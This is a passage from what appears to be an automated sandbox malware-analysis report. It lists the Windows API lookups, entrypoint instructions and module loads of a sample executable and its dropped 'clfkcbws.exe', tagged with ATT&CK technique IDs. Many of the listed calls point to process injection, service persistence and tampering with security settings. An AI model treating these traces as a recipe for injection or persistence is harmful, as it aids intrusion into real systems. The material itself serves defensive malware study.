\"clfkcbws.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalW (UID: 00000000-00005112)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitHelperDll (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CryptEnumProvidersW (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerW (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenServiceW (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceConfigW (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseServiceHandle (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatus (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpInitialize (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegisterGPNotification (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter UnregisterGPNotification (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetHashInterface (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCipherInterface (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadUILanguage (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpTerminate (UID: 00000000-00005336)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005336)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00000364)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00000364)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00000364)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00000364)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalA (UID: 00000000-00000364)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter DnsQuery_A (UID: 00000000-00000364)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"\n \"clfkcbws.exe\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e7272@ADVAPI32.dll\"\n \"0e000f00703f7272@ADVAPI32.dll\"\n \"0e000f00cc3f7272@ADVAPI32.dll\"\n \"11001200b4477272@ADVAPI32.dll\"\n \"1100120048487272@ADVAPI32.dll\"\n \"120013008c487272@ADVAPI32.dll\"\n \"12001300e4487272@ADVAPI32.dll\"\n \"14001500906e7272@ADVAPI32.dll\"\n \"14001500a86e7272@ADVAPI32.dll\"\n \"14001500c06e7272@ADVAPI32.dll\"\n \"17001800d86e7272@ADVAPI32.dll\"\n \"0d000e00f06e7272@ADVAPI32.dll\"\n \"11001200006f7272@ADVAPI32.dll\"\n \"11001200146f7272@ADVAPI32.dll\"\n \"0d000e0034497272@SHELL32.dll\"\n \"0d000e00b0497272@SHELL32.dll\"\n \"0f00100054707272@ADVAPI32.dll\"\n \"1400150094707272@ADVAPI32.dll\"\n \"14001500ac707272@ADVAPI32.dll\"\n \"0c000d00f4707272@ADVAPI32.dll\"\n \"0c000d0004717272@ADVAPI32.dll\"\n \"0e000f0014717272@ADVAPI32.dll\"\n \"0e000f0024717272@ADVAPI32.dll\"\n \"0b000c0034717272@ADVAPI32.dll\"\n \"1400150068727272@SETUPAPI.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" loaded module \"KERNEL32.DLL\" at base 76b60000\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" loaded module \"WS2_32.DLL\" at base 77d50000\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" loaded module \"DBGHELP.DLL\" at base 6fa40000\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" loaded module \"USER32.DLL\" at base 764f0000\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" loaded module \"ADVAPI32.DLL\" at base 765f0000\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" loaded module \"SHELL32.DLL\" at base 76ef0000\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" loaded module \"OLEAUT32.DLL\" at base 76e50000\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" loaded module \"MSVCR100.DLL\" at base 6bc30000\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" loaded module \"NTDLL.DLL\" at base 77b40000\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" loaded module \"OLE32.DLL\" at base 76cf0000\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" loaded module \"CRYPTBASE.DLL\" at base 75940000\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 746e0000\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" loaded module \"PROPSYS.DLL\" at base 74590000\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" loaded module \"COMCTL32.DLL\" at base 74940000\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" loaded module \"APPHELP.DLL\" at base 758f0000\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" loaded module \"CLBCATQ.DLL\" at base 75e30000\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 6aaa0000\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76b60000\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74590000\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" loaded module \"SETUPAPI.DLL\" at base 769c0000\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" loaded module \"RPCRT4.DLL\" at base 76c40000\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" loaded module \"NTMARTA.DLL\" at base 74eb0000\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77ca0000\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" loaded module \"PROFAPI.DLL\" at base 75a50000\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75ca0000\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 766a0000\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" loaded module \"SECUR32.DLL\" at base 75770000\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75cb0000\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 758f0000\n \"clfkcbws.exe\" loaded module \"GDI32.DLL\" at base 77cf0000\n \"clfkcbws.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 77cd0000\n \"clfkcbws.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70e40000\n \"clfkcbws.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"clfkcbws.exe\" loaded module \"KERNEL32\" at base 76b60000\n \"clfkcbws.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"clfkcbws.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 72740000\n \"clfkcbws.exe\" loaded module \"KERNEL32.DLL\" at base 76b60000\n \"clfkcbws.exe\" loaded module \"WS2_32.DLL\" at base 77d50000\n \"clfkcbws.exe\" loaded module \"DBGHELP.DLL\" at base 6fa40000\n \"clfkcbws.exe\" loaded module \"USER32.DLL\" at base 764f0000\n \"clfkcbws.exe\" loaded module \"ADVAPI32.DLL\" at base 765f0000\n \"clfkcbws.exe\" loaded module \"SHELL32.DLL\" at base 76ef0000\n \"clfkcbws.exe\" loaded module \"OLEAUT32.DLL\" at base 76e50000\n \"clfkcbws.exe\" loaded module \"MSVCR100.DLL\" at base 6bc30000\n \"clfkcbws.exe\" loaded module \"SSPICLI.DLL\" at base 758d0000\n \"clfkcbws.exe\" loaded module \"RPCRT4.DLL\" at base 76c40000\n \"clfkcbws.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77ca0000\n \"clfkcbws.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 758f0000\n \"netsh.exe\" loaded module \"DHCPCMONITOR.DLL\" at base 72da0000\n \"netsh.exe\" loaded module \"WSHELPER.DLL\" at base 71d00000\n \"netsh.exe\" loaded module \"KERNEL32.DLL\" at base 76b60000\n \"netsh.exe\" loaded module \"NSHHTTP.DLL\" at base 71ca0000\n \"netsh.exe\" loaded module \"FWCFG.DLL\" at base 6d870000\n \"netsh.exe\" loaded module \"AUTHFWCFG.DLL\" at base 6c0d0000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76b60000\n \"netsh.exe\" loaded module \"IFMON.DLL\" at base 703c0000\n \"netsh.exe\" loaded module \"NETIOHLP.DLL\" at base 6d270000\n \"netsh.exe\" loaded module \"WHHELPER.DLL\" at base 6e190000\n \"netsh.exe\" loaded module \"HNETMON.DLL\" at base 6d3f0000\n \"netsh.exe\" loaded module \"RPCNSH.DLL\" at base 6d260000\n \"netsh.exe\" loaded module \"DOT3CFG.DLL\" at base 6d190000\n \"netsh.exe\" loaded module \"NAPMONTR.DLL\" at base 6c690000\n \"netsh.exe\" loaded module \"NSHIPSEC.DLL\" at base 6a710000\n \"netsh.exe\" loaded module \"RPCRT4.DLL\" at base 76c40000\n \"netsh.exe\" loaded module \"NETTRACE.DLL\" at base 6a320000\n \"netsh.exe\" loaded module \"WCNNETSH.DLL\" at base 